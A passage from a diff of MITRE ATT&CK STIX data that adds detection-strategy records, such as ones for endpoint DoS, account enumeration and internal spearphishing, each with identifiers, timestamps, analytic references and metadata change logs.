+                            "url": "https://attack.mitre.org/detectionstrategies/DET0356",
+                            "external_id": "DET0356"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Endpoint DoS via OS Exhaustion Flood Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cecfe3bc-525a-431e-8ee1-5133ab8ce79c",
+                        "x-mitre-analytic--fde025ac-a180-472c-a9b5-b4fa1e97cc75",
+                        "x-mitre-analytic--4db0f97c-a0c4-4c96-af56-86c6b227ea42"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--253b632e-c4cb-4207-9b6a-58a35a07d2ea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0208",
+                            "external_id": "DET0208"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Endpoint Resource Saturation and Crash Pattern Detection Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3102edb4-6947-4cef-9660-4a35d582a716",
+                        "x-mitre-analytic--b7e4a6de-8ff3-4711-aa83-97533adec211",
+                        "x-mitre-analytic--5f2cc434-5edc-4f36-927a-eb48ee72aa6e",
+                        "x-mitre-analytic--472f81b1-99ba-406a-b2ef-d70b2af5b527",
+                        "x-mitre-analytic--7027622a-7a33-4189-a500-c54eef3467b6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2f961bd-ddc5-4940-bc62-e2b0bd3405f8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0229",
+                            "external_id": "DET0229"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Enumeration of Global Address Lists via Email Account Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cd91348f-296f-4007-a853-6d06d8175210",
+                        "x-mitre-analytic--e0ad2e3d-c109-4af0-ac44-0d4cd45407c2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fdda430c-e4f6-43ce-95d6-0f97253ff6a2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587",
+                            "external_id": "DET0587"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Enumeration of User or Account Information Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e576eaeb-2158-40f9-8edb-c119eac56442",
+                        "x-mitre-analytic--7b0d80c0-807e-46b1-b3f7-fd3e4f3aceba",
+                        "x-mitre-analytic--24aa5ee9-ba7f-4991-b32a-27d40ee2d010",
+                        "x-mitre-analytic--5d7158ce-17f5-4643-bde2-c0a4f2ba0b73",
+                        "x-mitre-analytic--cb177f89-c8a4-4233-a2e4-3fdd02dccba1",
+                        "x-mitre-analytic--c4973f27-c8db-4478-aaf8-eb73580fceec",
+                        "x-mitre-analytic--d85db7b4-5eb1-4781-b92c-a18102a568dc",
+                        "x-mitre-analytic--06e0501e-a87e-452d-9ab5-93ed9a5eade5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a59f4a44-d581-4026-802d-5dc5c0c9f7d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0474",
+                            "external_id": "DET0474"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1fd68bec-86cb-4457-b0cd-56fc724fd578",
+                        "x-mitre-analytic--c24eb4e0-f23a-4d93-b2e0-7f5e7cae44f6",
+                        "x-mitre-analytic--8cd02c43-f3f5-4623-a816-cefe1f586288"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dd8477c8-2aad-4db3-b810-fe0d2f605fa8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0080",
+                            "external_id": "DET0080"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Exploit Public-Facing Application \u2013 multi-signal correlation (request \u2192 error \u2192 post-exploit process/egress)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--17290910-5b25-477a-a0c0-c2661ff2585e",
+                        "x-mitre-analytic--a4ce8f28-db09-4b0d-bb8d-a77ba3cef3c0",
+                        "x-mitre-analytic--ddab6d30-7e37-462e-b183-39c7ceb2b986",
+                        "x-mitre-analytic--a57ad75c-331e-4607-b358-61f4cddb8a5d",
+                        "x-mitre-analytic--17f9487f-711d-4f28-9de8-209ae39d33d2",
+                        "x-mitre-analytic--0668f39a-d319-427f-b29b-160399e6f79a",
+                        "x-mitre-analytic--72298803-0644-477f-be89-01b173202577"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1894c2d7-ce4f-4cfd-8644-decb1e14f0c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0287",
+                            "external_id": "DET0287"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Exploitation for Client Execution \u2013 cross-platform behavior chain (browser/Office/3rd-party apps)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--065f2c96-6903-4cd1-a737-99ecf1fdc73e",
+                        "x-mitre-analytic--b3b58ac5-6b60-4c34-9842-46f5ee517bcb",
+                        "x-mitre-analytic--4aaf0a98-c6a9-4b30-a9d9-3a014473bd0e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ee73dd97-cf1a-4220-a7cf-52d864811bb4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0118",
+                            "external_id": "DET0118"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Exploitation of Remote Services \u2013 multi-platform lateral movement detection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f8c99f4f-f61e-436c-a093-c97969c9b038",
+                        "x-mitre-analytic--70e3066e-6ba3-444b-8e88-dfc3575f2706",
+                        "x-mitre-analytic--17b82342-cc75-4dcd-ad98-f313cd2a2b69",
+                        "x-mitre-analytic--32ef36a3-3112-40a1-84d0-323b7b86cb5b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bfb5cb12-7025-44c3-9a2d-79cfe42ecf54",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0325",
+                            "external_id": "DET0325"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "External Proxy Behavior via Outbound Relay to Intermediate Infrastructure",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--99b2296f-dc1c-4b0e-a05a-883a0dbb1535",
+                        "x-mitre-analytic--9a0c2390-f8e9-4f03-ae21-0e1e876fed89",
+                        "x-mitre-analytic--cd7fee55-79e6-42f4-9c68-e653cc8a1d24",
+                        "x-mitre-analytic--0c8a9540-51d7-4ba3-8594-8860b3fa8485",
+                        "x-mitre-analytic--bca44b88-4615-45b8-8fb9-ce934c65c8be"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ab9027fb-3499-474b-845c-50ee113c3be5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0167",
+                            "external_id": "DET0167"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Firmware Modification via Flash Tool or Corrupted Firmware Upload",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a0ecdd41-a051-4ada-9ec1-c29dc0c4ac61",
+                        "x-mitre-analytic--5b1514b3-e35b-4ea8-bcc1-b8e492d6d3cd",
+                        "x-mitre-analytic--df32865a-79b2-4faa-abd4-3ecfa27c8a77",
+                        "x-mitre-analytic--39d675d5-548d-4b35-8a8f-a6605ae3835d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4dfcf95f-0bbb-4ae7-8bd5-91e3e6c51809",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0368",
+                            "external_id": "DET0368"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Hardware Supply Chain Compromise Detection via Host Status & Boot Integrity Checks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8ba8d516-486a-4347-9a48-56a312e83897",
+                        "x-mitre-analytic--1c25310b-d8fa-472d-a10e-c327a8fba693",
+                        "x-mitre-analytic--0834f268-5810-4a90-8ef6-279dc0482471"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3efcd3e4-9238-4686-990b-27ac110dccfd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0133",
+                            "external_id": "DET0133"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "IDE Tunneling Detection via Process, File, and Network Behaviors",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e3517ec0-f12a-4f64-8d10-e6bc2677f7d7",
+                        "x-mitre-analytic--a0a0f8e9-7a55-4450-8569-7a0e1c0aac0b",
+                        "x-mitre-analytic--1a93a610-7389-4ea7-a053-e99d35a5477a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f3cc2f0f-c657-4453-90a8-d7c9a59d6e37",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0200",
+                            "external_id": "DET0200"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Indirect Command Execution \u2013 Windows utility abuse behavior chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9f3aea30-e100-432a-8aa0-959bd7f4e069"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--28630b41-d28f-4414-afc8-23cc9ce8696c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0075",
+                            "external_id": "DET0075"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Internal Proxy Behavior via Lateral Host-to-Host C2 Relay",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ca56c2df-0338-4325-964a-0f775d986277",
+                        "x-mitre-analytic--7f269271-6800-4d20-b9f7-6c38cecac6f0",
+                        "x-mitre-analytic--c62026a7-3332-489f-bb86-30626c1b3cc8",
+                        "x-mitre-analytic--c1fd84b0-953d-463b-a293-3d6aa81e4589",
+                        "x-mitre-analytic--42ba4dcf-0354-4d70-8c29-d0c3a8c90c23"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--acc27d20-8aad-42ce-b928-6cda3c22e51b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0054",
+                            "external_id": "DET0054"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Internal Spearphishing via Trusted Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0bf5b548-50d0-4e73-bb3c-413cbdfafd97",
+                        "x-mitre-analytic--b5b53b9d-f72b-4cd5-946b-d1ddfdad3c0f",
+                        "x-mitre-analytic--3533fba3-e80d-4ad0-be45-62460b28ad7c",
+                        "x-mitre-analytic--1e2211b9-1730-4645-89f6-11259b35e0a4",
+                        "x-mitre-analytic--5e3f407f-192b-4e6f-aab0-e0682da3a4a9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c8b4a2e4-386f-45b3-b32a-8ca4113e5592",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0082",
+                            "external_id": "DET0082"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Internal Website and System Content Defacement via UI or Messaging Modifications",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--78c505c6-25a1-4cc5-b44a-0574aa019f01",
+                        "x-mitre-analytic--8ba0c3e2-9544-47d1-9738-757c35dc19fa",
+                        "x-mitre-analytic--83d3222d-6a35-401d-95b5-a09f0eac2201",
+                        "x-mitre-analytic--c024ed9a-02bf-436d-93f5-444e45124e2f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
